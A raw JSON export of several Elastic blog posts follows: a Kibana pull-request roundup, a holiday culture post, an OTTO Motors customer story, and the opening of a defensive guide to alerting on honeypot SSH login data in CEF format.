href=\"https://github.com/elastic/kibana/pull/17586\"\u003e#17586\u003c/a\u003e).\u003c/p\u003e\n \n\n\n\u003ch3\u003ePRs\u003c/h3\u003e\n\n\n \u003cul\u003e\n \u003cli\u003eReenable VEGA_DEBUG for Vega visualization (\u003ca href=\"https://github.com/elastic/kibana/pull/20456\" \u003e#20456\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eMake aggTypeFilter registry return value directly (\u003ca href=\"https://github.com/elastic/kibana/pull/20523\" \u003e#20523\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003erefactoring geohash agg to not use vis (\u003ca href=\"https://github.com/elastic/kibana/pull/20298\" \u003e#20298\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eremoving angular from render_complete (\u003ca href=\"https://github.com/elastic/kibana/pull/20478\" \u003e#20478\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003emoving visualize legend into vislib legend (\u003ca href=\"https://github.com/elastic/kibana/pull/20479\" \u003e#20479\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eFix flaky TSVB test (\u003ca href=\"https://github.com/elastic/kibana/pull/20481\" \u003e#20481\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eFix editor sidebar with long field names (\u003ca href=\"https://github.com/elastic/kibana/pull/20455\" \u003e#20455\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eInspector enhancements (rename of buttons, slight design adjustments) (\u003ca href=\"https://github.com/elastic/kibana/pull/20452\" \u003e#20452\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eapplying scope in angular vis type (\u003ca href=\"https://github.com/elastic/kibana/pull/20461\" \u003e#20461\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eremoving angular dependency from base and react vis types (\u003ca href=\"https://github.com/elastic/kibana/pull/20386\" \u003e#20386\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eadding disabled aggs functional tests (\u003ca href=\"https://github.com/elastic/kibana/pull/20454\" \u003e#20454\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eSplit editor state from saved state (\u003ca href=\"https://github.com/elastic/kibana/pull/20323\" \u003e#20323\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eMove visualize editor out of visualize directive (\u003ca href=\"https://github.com/elastic/kibana/pull/20263\" \u003e#20263\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eDon't create nested search source per postflightrequest (\u003ca href=\"https://github.com/elastic/kibana/pull/20373\" \u003e#20373\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003ebwc for showMeticsAtAllLevels (\u003ca href=\"https://github.com/elastic/kibana/pull/20369\" \u003e#20369\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003e[Vega] Implement context filter modification (\u003ca href=\"https://github.com/elastic/kibana/pull/17586\" \u003e#17586\u003c/a\u003e)\u003c/li\u003e\n \u003c/ul\u003e\n\n\n\u003ch3\u003eDiscovery\u003c/h3\u003e\n\n\n\u003cp\u003ePRs\u003c/p\u003e\n \u003cul\u003e\n \u003cli\u003eRemove outdated aria attribute (\u003ca href=\"https://github.com/elastic/kibana/pull/20532\"\u003e#20532\u003c/a\u003e)\u003c/li\u003e\n \u003cli\u003eUse config filters:pinnedByDefault for filters created with filter editor (\u003ca href=\"https://github.com/elastic/kibana/pull/20359\"\u003e#20359\u003c/a\u003e)\u003c/li\u003e\n \u003c/ul\u003e\n","callout":[],"category":[],"created_at":"2019-04-01T13:14:55.780Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"uid":"blt29843bb98ba59a2a","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:37:11.833Z","updated_at":"2018-10-11T05:37:11.833Z","content_type":"image/jpeg","file_size":"71803","filename":"blog-kibana-banner.jpg","title":"blog-kibana-banner.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-18T15:49:05.384Z","user":"sys_blt57a423112de8a853"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt29843bb98ba59a2a/5bbee187eb7e90a514e6e46b/blog-kibana-banner.jpg"},"markdown_l10n":"","publish_date":"2018-07-13T16:31:33.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"The redesign, new layout engine, and reporting are all on the verge of merge.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"canvas.png","uid":"bltbf64f655ce7bbd44","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-01-05T07:00:17.079Z","updated_at":"2019-01-05T07:00:17.079Z","content_type":"image/png","file_size":"61177","filename":"canvas.png","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-30T19:59:05.130Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbf64f655ce7bbd44/5c30560193d9791a70cd73fb/canvas.png"},"title":"Keeping up with Kibana: This week in Kibana for July 9th, 2018","title_l10n":"Keeping up with Kibana: This week in Kibana for July 9th, 2018","updated_at":"2024-11-07T00:09:36.187Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/keeping-up-with-kibana-2018-07-09","publish_details":{"time":"2024-11-07T00:09:40.757Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt2166e53c2b6e512b","_version":17,"locale":"en-us","ACL":{},"abstract_l10n":"Winter is here. To celebrate the holiday season we held our inaugural Decemberfest.","author":["blt7fc3768df8cad1f6"],"body_l10n":"\u003cp\u003eWinter is here. Of course, for some, it feels like the whole of 2020 has been one long winter. Still, December means it’s finally time for the holiday season — a chance to celebrate, let our hair down, and ring in a new year full of promise and say goodbye to … whatever 2020 was.\u003c/p\u003e\n\u003cp\u003eNaturally, almost everyone is doing things a bit different this winter season, and Elastic is no exception. Although we’re \u003ca href=\"/blog/culture-elastic-distributed-by-design?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003edistributed by design\u003c/a\u003e, many of our Elasticians occasionally travel into an office and during this time of the year (in traditional years), these offices might hold a holiday party. We’re die-hard holiday fans but of course, COVID-19 means we’re playing it safe. That means, at least for this year, an in-house party is out of the question.\u003c/p\u003e\n\u003cp\u003eSo, we took the celebration virtual.\u003c/p\u003e\n\u003cp\u003eEarlier this year our Elastic Workplace team held the inaugural \u003ca href=\"/blog/culture-life-at-elastic-time-for-virtual-summer-camp?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003eSummer Camp\u003c/a\u003e experience as a way for Elasticians to combat Zoom fatigue with a little bit of fun. With the success of this event, the Elastic Workplace team decided to hold another virtual winter event to bring \u003ca href=\"/blog/culture-elastic-distributed-by-design?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003eour distributed team\u003c/a\u003e a little closer for the holiday season.\u003c/p\u003e\n\u003cp\u003eDecemberfest, our virtual holiday celebration, took place between December 1-10. Jam packed with a variety of activities that were both fun and family friendly, Elasticians were encouraged to gather the little ones and their significant others to sing during ElastiCarols, watch a bit of holiday magic during the Digital Deception Shows, and listen closely to Santa during storytime over his North Pole Broadcast (via Zoom).\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt3f37dadd6bc49c0a/5fd107008593bc52457edb73/Digital_Deception.jpg\" data-sys-asset-uid=\"blt3f37dadd6bc49c0a\" alt=\"Digital Deception magic show\" /\u003e\u003c/p\u003e\n\u003cfigcaption\u003ePick a card, any card at Digital Deception\u003c/figcaption\u003e\n\u003cp\u003eVirtual game shows such as Family Feud, Wheel of Fortune, The Amazing Race, Show Me the Movie, and Australia’s Got Talent gave our Elasticians a chance to blow off a bit of steam.\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5066fecaefcea985/5fd1074050460c30dd53fe43/Family_Fued.jpg\" data-sys-asset-uid=\"blt5066fecaefcea985\" alt=\"Virtual Family Fued\" /\u003e\u003c/p\u003e\n\u003cfigcaption\u003eOur virtual Family Feud!\u003c/figcaption\u003e\n\u003cp\u003eThere was also a virtual escape room that pitted teams against each other as they tried to crack various puzzles under a ticking clock.\u003c/p\u003e\n\u003cp\u003eIn addition to these fun activities there was an online cooking session from Amsterdam teaching families how to make a festive gnocchi. Also, a playful gingerbread house competition was held, with the winning house chosen by popular vote. There were prizes in four categories:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eMost on brand Elastic\u003c/li\u003e\n \u003cli\u003eMost local flair\u003c/li\u003e\n \u003cli\u003eMost creative\u003c/li\u003e\n \u003cli\u003eBest in show\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eHere are two creative entries using Elastic logos!\u0026nbsp;\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt17685f160c065ee1/5fd244f77c43e43bf4196978/Felix-Roessel-and-family.jpg\" data-sys-asset-uid=\"blt17685f160c065ee1\" alt=\"Gingerbread house with a manger\" /\u003e\u003c/p\u003e\n\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9a058cd4610f584c/5fd24549e53f3355047dc890/toby-yule-logstash.jpg\" data-sys-asset-uid=\"blt9a058cd4610f584c\" alt=\"Cluster yule log! \" /\u003e\u003c/p\u003e\n\u003cp\u003eAs a part of Decemberfest, we also highlighted holidays from around the globe. We asked our Elasticians to share local traditions and experiences through short videos and photos. The response was great, highlighting the traditions of over 9 different cultures.\u003c/p\u003e\n\u003cdiv class=\"video embed-container\" style=\"height: 319.725px;\"\u003e\u003c!-- The script tag should live in the head of your page if at all possible --\u003e\n \u003cscript type=\"text/javascript\" async src=\"https://play.vidyard.com/embed/v4.js\"\u003e\u003c/script\u003e\n \n \u003c!-- Put this wherever you would like your player to appear --\u003e\n \u003cimg\n style=\"width: 100%; margin: auto; display: block;\"\n class=\"vidyard-player-embed\"\n src=\"https://play.vidyard.com/5nWEkFJRwqtVeNTLhUrawJ.jpg\"\n data-uuid=\"5nWEkFJRwqtVeNTLhUrawJ\"\n data-v=\"4\"\n data-type=\"inline\"\n /\u003e\n \u003c/div\u003e\n\u003cp\u003eAnd of course, just like Summer Camp, the Workplace team encouraged Elasticians to help build \u003ca href=\"https://open.spotify.com/playlist/0amPDfshe4Sw6PFWOSNnWl?si=jVyqhDUHRf-NP_JVzDEWHQ\" target=\"_self\"\u003ea collaborative playlist full of holiday cheer.\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eAnd what would the holidays be without a little giving back? In the spirit of the season we held three virtual volunteering sessions. These one-hour sessions were held on \u003ca href=\"https://www.zooniverse.org/?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003ethe Zooniverse platform\u003c/a\u003e, where volunteers helped power research with real-world impact. We also celebrated Giving Tuesday for Elasticians by matching donations to contribute to their favorite organizations.\u003c/p\u003e\n\u003cp\u003e“We had a lot more participation during Decemberfest than we did for Summer Camp,” said Corey Williams, Workplace lead for the Americas. “I think this was because we had a bit more lead time putting this event together — we knew that it was going to be a virtual event from the start and were better able to advertise. We were also able to get buy-in and promotion from leadership for this event after the success of Summer Camp, which really encouraged people to take the time off and have a little fun.”\u003c/p\u003e\n\u003cp\u003e\u003cem\u003eInterested in joining Elastic? We’re hiring. Check out \u003c/em\u003e\u003ca href=\"/about/teams/?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003e\u003cem\u003eour teams\u003c/em\u003e\u003c/a\u003e\u003cem\u003e and f\u003c/em\u003e\u003ca href=\"/about/careers/?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003e\u003cem\u003eind the right career for you!\u003c/em\u003e\u003c/a\u003e\u003cem\u003e Want to read more about life at Elastic? Read more \u003c/em\u003e\u003ca href=\"/blog/category/culture?baymax=web\u0026elektra=culture-life-at-elastic-decemberfest-for-the-holidays\" target=\"_self\"\u003e\u003cem\u003eon our blog\u003c/em\u003e\u003c/a\u003e\u003cem\u003e!\u003c/em\u003e\u003c/p\u003e","callout":[],"category":[{"uid":"bltc253e0851420b088","_version":4,"locale":"en-us","ACL":{},"created_at":"2018-08-27T12:45:23.873Z","created_by":"sys_blt57a423112de8a853","key":"culture","label_l10n":"Culture","tags":[],"title":"Culture","updated_at":"2024-05-10T13:44:28.145Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"time":"2024-05-10T13:44:53.214Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"created_at":"2020-12-09T17:06:09.930Z","created_by":"blt458f9d272024a3ea","disclaimer":[],"full_bleed_image":{"uid":"bltbea6d2e763185fb5","created_by":"blt458f9d272024a3ea","updated_by":"blt458f9d272024a3ea","created_at":"2019-04-23T17:18:10.126Z","updated_at":"2019-04-23T17:18:10.126Z","content_type":"image/jpeg","file_size":"39168","filename":"ElasticSocialCover.jpg","title":"ElasticSocialCover.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-04-23T18:59:41.698Z","user":"blt458f9d272024a3ea"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbea6d2e763185fb5/5cbf48d25e2924fa1e667d58/ElasticSocialCover.jpg"},"markdown_l10n":"","publish_date":"2020-12-10T07:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Life @ Elastic: Decemberfest for the holidays","seo_description_l10n":"Winter is here. To celebrate the holiday season we held our inaugural Decemberfest.","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt6fda1e7f27dfac2c","ACL":{},"_version":1,"content_type":"image/jpeg","created_at":"2020-12-09T17:25:20.506Z","created_by":"blt458f9d272024a3ea","file_size":"111625","filename":"Decemberfest_logo.jpg","is_dir":false,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-10T16:00:17.697Z","user":"blt458f9d272024a3ea"},"tags":[],"title":"Decemberfest_logo.jpg","updated_at":"2020-12-09T17:25:20.506Z","updated_by":"blt458f9d272024a3ea","url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6fda1e7f27dfac2c/5fd10880d0df66524b5d307e/Decemberfest_logo.jpg"},"title":"Life @ Elastic: Decemberfest for the holidays","title_l10n":"Life @ Elastic: Decemberfest for the holidays","updated_at":"2024-11-06T23:52:49.912Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/culture-life-at-elastic-decemberfest-for-the-holidays","publish_details":{"time":"2024-11-06T23:53:15.957Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt139a2b908c704d4c","_version":5,"locale":"en-us","ACL":{},"abstract_l10n":"OTTO Motors designs, manufactures, and operates self-driving vehicles used for industry. Learn how they use the Elastic Stack to run and monitor their fleet.","author":["bltb9daa73e034ee57e"],"body_l10n":"\u003cp\u003e\u003ci\u003eThis post is a recap of a user talk given at \u003ca href=\"/elasticon/conf/2018/sf\"\u003eElastic{ON} 2018\u003c/a\u003e. Interested in seeing more talks like this? Check out the conference archive\u0026nbsp;or\u0026nbsp;find out when the \u003ca href=\"/elasticon\"\u003eElastic{ON} Tour\u003c/a\u003e is coming to a city near you.\u003c/i\u003e\n\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://ottomotors.com/\"\u003eOTTO Motors\u003c/a\u003e — a part of \u003ca href=\"https://www.clearpathrobotics.com/\"\u003eClearpath Robotics\u003c/a\u003e — designs, manufactures, and operates self-driving industrial vehicles. Their goal is to use robotics to make human-driven operations obsolete. Their mobile robot fleet operate in over 40 countries, allowing companies to automate work, including some that would otherwise be dangerous for humans.\n\u003c/p\u003e\u003cp\u003eOperating so many robots requires a management system that can identify problems quickly, improve development speed, industrialize solutions at cost, and easily connect to IoT technology. OTTO Motors also relies on intelligent path planning, which requires high volumes of data points to be processed live, so that robots know how to get from A to B at both an individual unit and fleet level.\n\u003c/p\u003e\u003cp\u003eOTTO Motors needed a full stack solution that could be tested without huge expense or the need to build new technologies, and that would plug easily into existing software already in use within the company. While searching for a solution that fit all this criteria, the OTTO Motors team made a survey of the wide, IoT solution landscape. “We wanted something quick,” says Greg Jacobs, former Manager of Infrastructure at OTTO Motors. “Turns out Elastic was the best thing to start with.”\n\u003c/p\u003e\u003cp\u003eUltimately, the team at OTTO Motors chose the \u003ca href=\"/products\"\u003eThe Elastic Stack\u003c/a\u003e for three key reasons:\n\u003c/p\u003e\u003col\u003e\n\t\u003cli\u003eElastic’s products have HTTP/JSON APIs readily available for use. With the Elastic Stack, it was easy to get data into the service because it played nicely with other existing internal products and services already in use. In addition, Elastic provided easy-to-use client libraries and rich data collection options.\u003c/li\u003e\n\t\u003cli\u003eA single computer could be used to install and run the Elastic Stack, and out-of-the-box was an independent system, nothing else needed to be built to be off to the races. From the install, it was easy to get started, explore, start plugging things in with the Elastic Stack, and scale as OTTO Motors’ needs grew.\u003c/li\u003e\n\t\u003cli\u003eKIbana is web-based, easy to use, and well-integrated for use by a variety of end users/use cases, making it useful across the entire company. \u003c/li\u003e\n\u003c/ol\u003e\u003cp\u003eAgain, Greg Jacobs: “[The Elastic Stack] was the seed to plant. But it isn’t going to be something that grows into (just) a walled (off) garden. It will work with all the other stuff.”\n\u003c/p\u003e\u003cp\u003eTo that end, OTTO Motors moved beyond simply using the Elastic Stack for IoT applications, and deployed it to help with software development QA, IT security, and building dashboards for exploratory reports. For example, automated systems for testing robots at OTTO Motors makes virtual docker containers to create Lidar data that the robots read as real obstacles. Elastic also allows OTTO Motors to perform high-speed simulations that the robots can complete instantaneously. This allows OTTO Motors to exercise their fleet management software at hundreds, if not thousands of times faster than normal speed, all while using \u003ca href=\"/products/beats/metricbeat\"\u003eMetricbeat\u003c/a\u003e and other tools provided by Elastic to test for issues within the system.\u003c/p\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltee4a974b8d3accea/5f9b2254432f517518d40b71/blog-otto-motors.png\" data-sys-asset-uid=\"bltee4a974b8d3accea\" alt=\"blog-otto-motors.png\"\u003e\u003c/p\u003e\u003cp\u003eRunning a large fleet of robots produces a massive amount of data which is fed to Elastic. The amount of data collected by OTTO Motor robots is overwhelming: over 5k data points every 10 seconds for every robot in a fleet. This includes CPU time, WiFi signal, motor temperature, navigation details, and more. And they use Elastic to aggregate all that data into 30 minute reporting windows.\u003cbr\u003e\u003c/p\u003e\u003cp\u003eOTTO Motors also uses Elastic’s monitoring feature to create custom dashboards to discover hidden trends, see what indices are being hit hardest, and to learn what’s popular with users.\n\u003c/p\u003e\u003cp\u003eThe Otto Motors story is about full stack needs and full stack solutions. Want to learn more about how Otto Motors uses the Elastic Stack to make their robotics work better across the globe? Watch \u003ca href=\"/elasticon/conf/2018/sf/the-quick-starter-stack-for-robotics-iot-and-big-data\"\u003eThe Quick Starter Stack for Robotics, IoT, and Big Data\u003c/a\u003e talk from \u003ca href=\"/elasticon/conf/2018/sf\"\u003eElastic{ON} 2018\u003c/a\u003e. In it you’ll learn more about how the Elastic Stack makes maintaining and growing a fleet of intelligent, self-driving robots a reality.\n\u003c/p\u003e\u003cp\u003e\u003ca href=\"/elasticon/conf/2018/sf/the-quick-starter-stack-for-robotics-iot-and-big-data\"\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt649d393fa3c4fcfe/5c57df9352256ff20b4afaf7/Screen_Shot_2018-08-22_at_1.28.13_PM.png\" data-sys-asset-uid=\"blt649d393fa3c4fcfe\" alt=\"OttoMotors\" style=\"display: block; margin: auto;\"\u003e\u003c/a\u003e\n\u003c/p\u003e","callout":[],"category":[],"created_at":"2019-04-01T13:18:20.287Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"full_bleed_image":{"title":"Otto Motors Robot.jpg","uid":"blt848477ef43cd5e44","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T06:46:08.007Z","updated_at":"2019-02-04T06:46:08.007Z","content_type":"image/jpeg","file_size":"97632","filename":"Otto_Motors_Robot.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-04T00:27:50.533Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt848477ef43cd5e44/5c57dfb0bfa899f60ba15b17/Otto_Motors_Robot.jpg"},"markdown_l10n":"","publish_date":"2018-08-29T16:00:00.000Z","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","canonical_tag":"","noindex":false},"tags":[],"tags_campaigns":[],"tags_culture":[],"tags_elastic_stack":[],"tags_event_type":[],"tags_industry":[],"tags_partner":[],"tags_role":[],"tags_stage":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"title":"Otto Lifting Boxes.jpg","uid":"blt80f2d9e315ace427","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2019-02-04T06:46:01.951Z","updated_at":"2019-02-04T06:46:01.951Z","content_type":"image/jpeg","file_size":"84298","filename":"Otto_Lifting_Boxes.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2019-05-04T00:27:50.533Z","user":"blt3044324473ef223b70bc674c"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt80f2d9e315ace427/5c57dfa965ace9e30b3162cf/Otto_Lifting_Boxes.jpg"},"title":"OTTO Motors: Using the Elastic Stack to Expand the IoT Landscape","title_l10n":"OTTO Motors: Using the Elastic Stack to Expand the IoT Landscape","updated_at":"2024-11-06T23:47:50.366Z","updated_by":"blt3044324473ef223b70bc674c","url":"/blog/otto-motors-using-the-elastic-stack-to-expand-the-iot-landscape","publish_details":{"time":"2024-11-06T23:48:14.571Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt3d714c185de05d98","_version":6,"locale":"en-us","ACL":{},"abstract_l10n":"","author":["blt0dbe04e5acc0f969","blt56b72f7b321d80a4"],"body_l10n":"\u003ctable style=\"background: #FFFFD2;\"\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003eGet your ArcSight security data into Elasticsearch and visualized in Kibana in literally minutes with the Logstash ArcSight module. \u003ca href=\"https://www.elastic.co/arcsight\"\u003eLearn more\u003c/a\u003e.\u0026nbsp;\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003e\u003cem\u003eEditor's Note: Be sure to check out the other posts in this 6-part blog series.\u0026nbsp;\u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-1\"\u003e\u003cem\u003ePart 1\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u0026nbsp;kicks off the series with getting started content.\u0026nbsp;\u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-3\"\u003e\u003cem\u003ePart 3\u003c/em\u003e\u003c/a\u003e\u003cem\u003e walks you through how to scale the architecture. \u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-4\"\u003e\u003cem\u003ePart 4\u003c/em\u003e\u003c/a\u003e\u003cem\u003e and \u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-5\"\u003e\u003cem\u003ePart 5\u003c/em\u003e\u003c/a\u003e\u003cem\u003e provide examples of setting up alerts for common security threats using the alerting features in X-Pack.\u0026nbsp;\u003c/em\u003e\u003ca href=\"https://www.elastic.co/blog/integrating-elasticsearch-with-arcsight-siem-part-6\"\u003e\u003cem\u003ePart\u0026nbsp;6\u003c/em\u003e\u003c/a\u003e\u003cem\u003e\u0026nbsp;extends the alerting\u0026nbsp;story\u0026nbsp;with automated anomaly detection using machine learning.\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eIn the \u003ca href=\"/blog/integrating-elasticsearch-with-arcsight-siem-part-1\"\u003efirst post\u003c/a\u003e in the \"Integrating the Elastic Stack with ArcSight SIEM\" blog series, we demonstrated how to send Common Event Format (CEF) data from an ArcSight connector to the Elastic Stack. \u0026nbsp;We will continue the series with several posts illustrating how to proactively monitor security data in Elasticsearch using X-Pack alerting features.\u0026nbsp;\u003c/p\u003e\u003cp\u003eThe X-Pack alerting capability allows users to watch for changes or anomalies in their data and perform necessary actions in response. \u0026nbsp;For those new to the capability, consider exploring the \u003ca href=\"https://www.elastic.co/guide/en/x-pack/current/how-watcher-works.html\"\u003eGetting Started Content\u003c/a\u003e and \u003ca href=\"https://www.youtube.com/watch?v=gD7MGt5jgDY\"\u003eElastic Watcher Lab series\u003c/a\u003e.\u003c/p\u003e\u003cp\u003eWhile we have many \u003ca href=\"https://github.com/elastic/examples/tree/master/Alerting\"\u003eexisting examples\u003c/a\u003e of alerting on data in Elasticsearch, we will focus our examples in this blog series specifically on data in the CEF format. Our hope is that providing these examples tailored for the CEF format will be valuable to users looking to complement their existing ArcSight-based security solutions with the Elastic Stack. The alert configurations (\"watches\") themselves, however, are applicable to any CEF compliant data with the required fields. The test environment referenced additionally requires no further configuration to integrate with ArcSight - simply forward events to the Logstash TCP port and start enjoying the watches!\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eThroughout this blog series we will focus on rule-based alerting, starting with a relatively simple use case before progressing to more complex pattern detection. \u0026nbsp;Finally we will explore machine learning-based anomaly detection as we attempt to address the obvious challenges with pure rule-based alerting approaches for more complex pattern detection.\u003c/p\u003e\u003cp\u003eSecurity analytics watches execute against a constant stream of data in real time. Each watch will execute periodically, accessing the last N seconds and raising an alert if required. Throughout this series we utilise several static historical datasets which cover up to a month period. In order to test, we can’t realistically ingest the data and wait for events to fire over the next month! We have therefore adjusted the watches to execute over the full indexed dataset.\u003cbr /\u003e\u003c/p\u003e\u003ch3\u003eSuccessful Login From an External IP\u003c/h3\u003e\u003cp\u003e\u003cem\u003eProblem: \"Alert if a successful SSH login is performed from an External IP\"\u003c/em\u003e\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eWe start with a simple watch to introduce the concepts of using basic alerting in X-Pack to identify specific patterns in your Elasticsearch data.\u003c/p\u003e\u003cp\u003eFor our first use case, we utilise a common source of event data - authentication logs. The sample dataset consists of inbound SSH logs (in the CEF format) from a single honeypot during the month of November 2016. Below is a sample log line in the CEF format. The highlighted fields will be used in the watch definition.\u0026nbsp;\u003c/p\u003e\u003cpre class=\"prettyprint\"\u003eCEF:0|Unix|Unix|5.0|cowrie.login.success|login attempt [root/!root] succeeded|Unknown|destinationUserName=root externalId=15 startTime=Nov 15 2016 19:22:29 destinationHostName=elastic_honeypot destinationAddress=192.168.20.2 deviceReceiptTime=Nov 15 2016 19:22:29 deviceTimeZone=Z transportProtocol=TCP applicationProtocol=SSHv2 destinationServiceName=sshd devicePayloadId=15 message=login attempt [root/!root] succeeded categoryOutcome=success categoryBehaviour=cowrie.login.success sourceTranslatedAddress=192.168.1.105 sourceAddress=192.168.1.105 deviceDirection=1 cs1=0 cs1Label=isError cs2=SSHService ssh-userauth on HoneyPotSSHTransport,2,192.168.1.105 cs2Label=system cs3=!root cs3Label=password cs4=111f70f0 cs4Label=session\u0026lt;span style=\"font-size: 14px; white-space: normal;\"\u0026gt;\u003cbr /\u003e\u0026lt;/span\u0026gt;\u003cbr /\u003e\u003c/pre\u003e\u003cp\u003eThe values of cowrie.login.failed and cowrie.login.success for our categoryBehaviour represent a failed and successful login respectively. \u0026nbsp;The field destinationAddress indicates the target server. \u0026nbsp;Note that while our example data is from a single server, the provided watch could be applied to a larger infrastructure with potentially hundreds of servers. To determine if the connection originated from an external IP address, we utilise the field sourceAddresss. Finally, the startTime indicates the time at which the event occurred. This field will be be parsed by our Logstash config file into the @timestamp field.\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eTo ingest this dataset, we use a simple Logstash configuration enabled with the CEF codec. \u0026nbsp;Instructions for downloading and ingesting this dataset, with supporting dashboards, can be found \u003ca href=\"https://github.com/elastic/examples/tree/master/Security%20Analytics/ssh_analysis\"\u003ehere\u003c/a\u003e.\u003cbr /\u003e\u003c/p\u003e\u003cp\u003eWith around 114,000 SSH events, our honeypot attracted quite some attention. \u0026nbsp;As you would expect, this is dominated by failed attempts as attackers iterated through common password lists.\u003c/p\u003e\u003cp\u003e\u003cimg 